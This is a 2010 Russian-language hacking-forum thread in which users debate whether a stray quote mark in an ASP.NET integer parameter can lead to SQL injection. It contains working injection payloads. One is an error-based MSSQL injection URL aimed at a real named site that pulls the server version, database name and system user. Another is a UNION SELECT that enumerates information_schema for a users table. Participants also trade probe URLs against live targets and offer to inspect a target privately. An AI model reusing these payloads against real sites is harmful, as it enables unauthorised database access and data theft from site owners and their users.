Старый 21.10.2010, 14:10   #451
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Цитата:
/index.aspx?a=1'

Error converting data type nvarchar to int.
Следовательно переменная a имеет тип integer, ну и каким макаром кавычка переконапатится в int?!
А в вашей ссылке инжект в mssql, понятно что он не безгрешен, но ведь его можно и к пхп прикрутить! Но тут речь об ASP.NET - вот максимальный толк от кавычки(при условии, что горе-кодер забыл убрать вывод ошибок):
Цитата:
http://www.***.org/w/bookshop/add.aspx?id=361%27
Попробуйте применить ту тему вашего блога к данному случаю...

Последний раз редактировалось Twost; 16.05.2013 в 06:19..
Cross вне форума   Ответить с цитированием
Старый 21.10.2010, 14:58   #452
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию

Цитата:
Сообщение от Cross Посмотреть сообщение
Следовательно переменная a имеет тип integer, ну и каким макаром кавычка переконапатится в int?!
А в вашей ссылке инжект в mssql, понятно что он не безгрешен, но ведь его можно и к пхп прикрутить! Но тут речь об ASP.NET - вот максимальный толк от кавычки(при условии, что горе-кодер забыл убрать вывод ошибок):

Попробуйте применить ту тему вашего блога к данному случаю...
Exception Details: System.Data.SqlClient.SqlException: Error converting data type nvarchar to int.
MSSQL Возвращает ошибку типов данных. А не приложение.
__________________
Twitter - @Ctacok
Ctacok вне форума   Ответить с цитированием
Старый 21.10.2010, 16:22   #453
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
Post

Нет!
Это C# пытается неявно конвертануть переменную! А SqlClient.SqlException выводится потому, что функция, которая получает эту переменную, отлавливает именно это исключение! Никакого запроса в базу не происходит и уж тем более не mssql возвращает ошибку!
Примерно такая там функция:
Код:
try
{
   ...
   int id = request["a"]; <--- здесь появляется ошибка и сразу срабатывает исключение! Это компилируемый язык!
   ...
   // и только потом формируется запрос!
   string query = "SELECT.... WHERE a = " + id.ToString();
   // а дальше уже непосредственно запрос в бд
}
catch (SqlException exc)
{
   string error = exc.Message;
}
А мы видим эту ошибку потому, что в web.config прописан параметр <customErrors mode="RemoteOnly">
Cross вне форума   Ответить с цитированием
Старый 21.10.2010, 16:33   #454
aka_zver
 
Аватар для aka_zver
 
Регистрация: 06.07.2010
Сообщений: 63
Репутация: 37
По умолчанию

чё спорить то
http://www.iea.org/index_info.asp?id=1564+and+1=@@version%2b'::'%2bdb _name()%2b'::'%2bsystem_user--

Последний раз редактировалось Twost; 16.05.2013 в 06:19..
aka_zver вне форума   Ответить с цитированием
Старый 21.10.2010, 16:54   #455
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Это обычный asp! Попробуй замутить такое с asp.net(aspx и причем реальный .net, а не приписанное хтаксесом расширение)!
/\/\/\
Cross вне форума   Ответить с цитированием
Старый 21.10.2010, 17:36   #456
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию

Цитата:
Сообщение от skM Посмотреть сообщение
/index.aspx?a=1'



есть здесь инжект ?
Линк пожалуйста.
__________________
Twitter - @Ctacok
Ctacok вне форума   Ответить с цитированием
Старый 21.10.2010, 18:12   #457
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Забудьте! Даже если кто-то и знает как это обойти - не спалят, ибо половина интернета будет в опасности! oO
Cross вне форума   Ответить с цитированием
Старый 21.10.2010, 18:31   #458
Ctacok
 
Аватар для Ctacok
 
Регистрация: 06.07.2010
Сообщений: 127
Репутация: 49
По умолчанию

Цитата:
Сообщение от Cross Посмотреть сообщение
Забудьте! Даже если кто-то и знает как это обойти - не спалят, ибо половина интернета будет в опасности! oO
Признаю, лажанулся, ты прав.
Просто писал бложек на asp.net и тем самым исследовал ошибки в mssql, ошибка была такого рода.
__________________
Twitter - @Ctacok
Ctacok вне форума   Ответить с цитированием
Старый 21.10.2010, 18:32   #459
skM
 
Регистрация: 06.07.2010
Сообщений: 95
Репутация: 8
По умолчанию

Цитата:
Попробуй, перепроверить, так:
Цитата:
http://www.site.com/script.php?id=1'+union+select+1,table_schema,3,4+f rom+information_schema.tables+where+table_name='us ers'+--+
перепроверил, все ок. выводит таблицу.
но все равно
Цитата:
Table db.Users doesn't exist
skM вне форума   Ответить с цитированием
Старый 21.10.2010, 19:18   #460
Cross
 
Регистрация: 27.08.2010
Сообщений: 114
Репутация: 2
По умолчанию

Цитата:
Сообщение от Ctacok Посмотреть сообщение
Признаю, лажанулся, ты прав.
Просто писал бложек на asp.net и тем самым исследовал ошибки в mssql, ошибка была такого рода.
Забей! Одно время я с этим долго ковырялся...

Цитата:
перепроверил, все ок. выводит таблицу.
но все равно
Если не хочешь палить линк - скинь в пм, посмотрю...
Cross вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot